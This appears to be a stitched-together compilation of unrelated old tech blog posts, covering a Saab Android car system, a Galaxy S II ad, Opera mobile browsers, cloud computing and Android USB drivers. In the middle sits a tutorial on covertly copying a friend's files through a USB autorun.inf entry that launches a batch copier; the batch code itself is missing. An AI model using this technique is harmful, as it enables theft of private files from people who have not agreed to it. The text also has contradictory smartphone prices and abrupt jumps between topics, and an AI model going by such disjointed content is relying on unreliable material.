Perhaps it was inevitable — science fiction is coming to life next year as Saab plans to release a car powered by the Android mobile operating system. Android will allow cars to run apps and owners to review unprecedented amounts of feedback from their own cars.

Saab has announced that the 2012 Saab 9-3 will include a capacitive screen in the dash that runs an Android-powered “infotainment” system called iQon (pronounced “icon”). While some luxury vehicles have included very minimal systems, mostly focusing on GPS and settings such as temperature, using Android will basically open up the Saab interface to anything developers can dream up. The very open-source nature of Android that makes it so popular for smartphones will also make the Saab capable of everything from playing media to online shopping.

The 2012 Saab 9-3 will have a 3G (or possibly 4G) wireless connection that will keep a constant Internet connection in the car. This means it will have all the Web browsing, social networking, useful apps, media, navigation and (of course) communication found in an Android phone.

Car enthusiasts will also be happy to learn that the iQon system will also be able to tap into the 500 sensors in the car and give feedback on things such as driver workload, yaw rate, steering wheel angle, and engine speed/torque. Previously, this information had only been available to consumers with a third-party system that must be plugged into the car. The iQon system, however, could just e-mail the data to users.

Of course, such a complex system in the dash raises some genuine concerns as well. For instance, a simple radio volume knob has distracted drivers into accidents, so a highly interactive Android device will likely be even more distracting. If you thought texting while driving was dangerous, imagine what kind of accidents playing Angry Birds could cause.

Also, having such sensitive data available raises security issues. Saab insists that there will be multiple firewalls that protect the car from the possibility of remote tinkering, especially from the third-party developers who make apps for it.

There is no specific release date for the Saab 9-3, but it is expected to go on sale sometime in 2012.

Samsung has released yet another ad for their flagship extraordinaire,

the Galaxy S II. This time the main focus is on the industry-leading (so far)

Exynos chipset, packing a dual-core processor, clocked at 1.2 GHz

and the HSPA+ internet speeds. The ad promises there will be

no more breaks, just smooth sailing.

The Samsung Galaxy S II is looking to be one of the most expensive

smartphones on the market,and priced somewhere in the $199-$249

range.

Samsung Galaxy S II i9100 Android 2.3 Gingerbread Smartphone will be

released at some point in the beginning of May 2011. The 16GB version

unlocked version will be priced somewhere in the range of $599- $699 USD,

while the price of 32GB variant remains unknown.

The video is shot on a square in front of a beautiful building in some
desirable location (probably) and displays two sets of dance groups.
One of them represents the hiccup performance with the brakes,
stuttering while dancing and then comes the zippier, more fluid one,
which dances circles around the first one.

This ad could be seen as a diss to the original Galaxy S by some.
We know that a better, upgraded
phone will be an inevitable occurrence a year after this one has come out.
But there’s no need to belittle its predecessor.
That’s just bad taste.

How to hack files from other pc

In today’s article I am going to teach you something illegal but only for educational propose. This only demonstrates how you can copy files from your friend’s PC as soon as you plug in your flash drive or any removable storage media.

I am going to teach you how you can do this from batch file with the help of autorun.inf file.
Let me tell you the basic things what will happen.

When you plug in in your Pen drive, system will look up for autorun.inf (incase if autorun is not disabled for your drive from the system).

Then we’ll input some command in autorun.inf in such a way that it will load the batch file that does the magic of copying all the files from your PC. In this demonstration I am copying only the files and folders in My Documents.

Here goes the batch code:

What it actually does is in first case ,CHECK it checks if your removable storage have Copied_files folder or not. If it doesn’t have then it creates one by using MD (Make Directory) command.

Again it checks if you have documents and settings folder then it will assume that you are using windows XP. Other wise it will return an error and exits.

This happens because; in Windows XP the user’s documents are usually stored in %systemroot%\Documents and Settings folder.

Now I’ve defined another two cases after the first case CHECK, that is COPIER case and ERROR case.

Case COPIER will execute when the program recognizes it is Windows XP, where the real coying work goes o.

Case ERROR will execute when the Documents and Settings doesn’t exists in your system root.

This is just a simple use of Batch programming. Copy the above code and paste it in notepad and save it as Filename.bat.

Now let’s create a file that will load it automatically.

[autorun] Open=Filename.bat Action=File Copier

The above code goes in autorun.inf file. Open notepad and copy it and paste it and save as autorun.inf.

Copy the two files, autorun.inf and Filename.bat in your flash drive.

Then plug in your device to your friends PC and do the evil things.

Where is the flaw?

It shows Command prompt window and process of copying (thank god your noob never think that it actually copying).

Another thing is that it determines the windows by searching the file users and Docuemnts and settings, which is not the right way to determine your system operating system.

However this is just an educational tutorial.

It’s one thing to know that your systems generally are under fire from hackers around the world. It’s another to understand specific attacks against your systems that are possible.

Many information-security vulnerabilities aren’t critical by themselves.
However, exploiting several vulnerabilities at the same time can take its toll.

For example, a default Windows OS configuration, a weak SQL Server administrator password, and a server hosted on a wireless network may not be major security concerns separately. But exploiting all three of these vulnerabilities at the same time can be a serious issue.

Nontechnical attacks

Exploits that involve manipulating people — end users and even yourself —are the greatest vulnerability within any computer or network infrastructure.
Humans are trusting by nature, which can lead to social-engineering exploits.
Social engineering is defined as the exploitation of the trusting nature of human beings to gain information for malicious purposes.

Network-infrastructure attacks

Hacker attacks against network infrastructures can be easy, because many networks can be reached from anywhere in the world via the Internet. Here are some examples of network-infrastructure attacks:

Connecting into a network through a rogue modem attached to a
computer behind a firewall
Exploiting weaknesses in network transport mechanisms, such as TCP/IP and NetBIOS
Flooding a network with too many requests, creating a denial of service (DoS) for legitimate requests

Opera Mini 6 and Opera Mobile 11

Opera Mini 6 and Opera Mobile 11 unvieled

Opera has now taken the two browsers to their next evolutionary step. Opera Mini has now been taken to version 6 and Opera Mobile is now Opera Mobile 11. Today we will take a close look at both of them.

Opera Mini 6

The biggest addition here is pinch to zoom, which wasn't available before. If you tried to pinch to zoom in, the browser would jump directly to 100 percent zoom level or get back to the full page view. There wasn't a finer control over the zoom level. Now, if you pinch, the page zooms in gradually and you can stop whenever you want and the browser will stick to that zoom level. You can select the maximum zoom level from settings but one thing we noticed was that unlike Opera Mobile, which allows you to zoom past the setting you have selected in the menu, Opera Mini stops zooming when you reach the selected zoom level.

There is a new Share function as well. In the Symbian version that we reviewed, we got the option of sharing the current page on Facebook, Twitter or on My Opera. In the Android version, it gives you access to a lot more applications to share a link.

Opera Mini 6 for Symbian is now a native Symbian application, instead of J2ME.
Apart from these additions, Opera Mini 6 is identical to the previous version.

Opera Mobile 11

Opera Mobile 11 has most of the new additions that Opera Mini 6 has received. It already had the pinch to zoom feature, so that is unchanged. The Share feature does work differently though and is oddly crippled here. In the Symbian version, we only got the option of sending the URL through an SMS or via Bluetooth. There was no mention of Facebook or Twitter sharing.

In comparison to Opera Mini, Opera Mobile is a lot smoother. Pages also looked a lot better and more accurate. The text also looks a lot better when you zoom in or out. If you have a smartphone that supports Opera Mobile with a decent connection plan then we would advise using it over Opera Mini. If you are on Symbian, there are no two ways about it; Opera Mobile 11 is the browser to use.
Overall, both the new browsers are good improvement over their predecessors, Opera Mini 6 more so than Opera Mobile 11. Then again Opera Mobile was fine to begin with so that's still fine. With new features such as Flash support and special versions for Honeycomb tablets (which we couldn't test for obvious reasons), Opera Mobile is poised to take away market share from established browsers.

This technology is from the past few years but it is only that the idea of cloud computing has evolved as an emerging technology in the field of computer science. The name of cloud computing is being derived from the existence of data and applications on a “cloud” of web servers. In simple words cloud computing can be defined as getting the work done by sharing and using resources and applications of a network environment without being concerned who is the owner and manager of these resources and applications. Now with help of this technology Resources and data required for the work to be done is no longer restricted to one’s personal computer but are hosted elsewhere enabling it to be accessible at any time and at any location and this advantage lifts the bar of time and place on the work to be done and hence make the user to work on it anytime and from anywhere.

Cloud Computing consists of Infrastructure as a service (IaaS), Platform as a service (PaaS) Hardware as a Service (HaaS) and Software as a service (SaaS). It also possesses the service of renting a server or servers and of running a geophysical modelling application that can be made available anywhere. Cloud Computing also enables the user to rent a virtual server, loaded with software and turn it on and off according to the sweet will of the user and it can also be cloned to meet an immediate workload demand. Cloud Computing also stores a large amount of data that can be accessed by the authorised users with the authorised applications. A base is being provided by the cloud that supports this technique and on this base regular changing workload is being dealt with by an automatic change in the scale according to the requirement of the workload.

A cloud is used as a storage medium which handles applications, business, and personal data also. Cloud Computing also possesses the ability by which only a few web services are being used to coordinate photos, maps, and GPS information to present the front page in users web browsers.

Cloud Computing has an important feature of workload shift so, personal computers are no more required to run these applications. There is a network of computers that handles the cloud itself. It significantly decreases the use of hardware as well as software on the front of user as all the processing and handling of data is done by the cloud. The USB Driver for Windows is available for download as an optional SDK component. You need the driver only if you are developing on Windows and want to connect an Android-powered device (ADP, Nexus One, or Nexus S) to your development environment over USB.

Download Google USB:

To download the driver, use the Android SDK and AVD Manager tool that is included with the Android SDK:

Launch the SDK and AVD Manager by double-clicking SDK Manager.exe, at the root of your SDK directory.
Expand the Third party Add-ons and Google Inc. add-ons.
Check Google Usb Driver package and click Install selected.
Proceed to install the package. When done, the driver files are downloaded into the <sdk>\google-usb_driver\ directory

Installing the USB Driver

Once you've downloaded your USB driver, follow the instructions below to install or upgrade the driver, based on your version of Windows and whether you're installing for the first time or upgrading an existing driver.
